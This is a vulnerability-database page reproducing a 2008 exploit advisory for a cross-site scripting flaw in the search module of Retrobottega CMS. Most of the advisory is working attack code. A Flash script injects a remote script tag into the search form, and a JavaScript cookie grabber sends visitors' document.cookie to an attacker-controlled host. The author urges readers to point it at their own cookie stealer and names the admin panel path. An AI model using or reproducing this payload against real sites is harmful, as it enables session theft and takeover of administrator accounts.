Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

retrobottega-xss.txt

🗓️ 14 Mar 2008 00:00:00Reported by cybermilitantType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 20 Views

Retrobottega cms XSS vulnerability, allows injection of malicious JavaScript for cookie stealing

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`----------------------------------------------------------------------------------  
| ___. .__.__ .__ __ __ |  
| ____ ___.__.\_ |__ ___________ _____ |__| | |__|/ |______ _____/ |_ |  
|_/ ___< | | | __ \_/ __ \_ __ \/ \| | | | \ __\__ \ / \ __\ |  
|\ \___\___ | | \_\ \ ___/| | \/ Y Y \ | |_| || | / __ \| | \ | |  
| \___ > ____| |___ /\___ >__| |__|_| /__|____/__||__| (____ /___| /__| |  
| \/\/ \/ \/ \/ \/ \/ |  
| |  
---------------------------------------------------------------------------------  
  
  
Author: cybermilitant   
Site: www.hacktime.org  
Vendor's site: www.ilretrobottega.net  
E-Mail: [email protected]   
Vulnerability: Cross Site Sctipting (XXS)   
Description: Retrobottega cms is suschettible of a cross site scripting vulnerability. The search's module is vulnerable and you can inject a simple javascript for execute xss's attacks. You should only edit the script for redirecting on yours cookie stealer.   
  
--->Thanks to: nexen<---  
  
Flash script:  
-------------------------------------------------------------------  
var target:String = "art";  
var lang:String = " it";  
var nome_pagina:String = "RISULTATI_RICERCA";  
var testo_da_ricercare:String = "<script src="http://[MYSITE]/documents.js"</script> ";  
var invia:String = "CERCA nel sito";  
  
getURL("[TARGET]/trovato.php", "_self", "POST");  
-------------------------------------------------------------------  
  
documents.js  
-------------------------------------------------------------------  
document.location='http://[MYSITE]/documents.php?c='+escape(document.cookie);  
-------------------------------------------------------------------  
  
In the end the classical cookie grabber...  
  
the admininstrator board is here: http://[TARGET]/gestione/index.php  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
14 Mar 2008 00:00Current
7.4High risk
Vulners AI Score7.4
retrobottegacmsxssvulnerabilityinjectionjavascriptcookie stealingadministrator board
20
.json
Report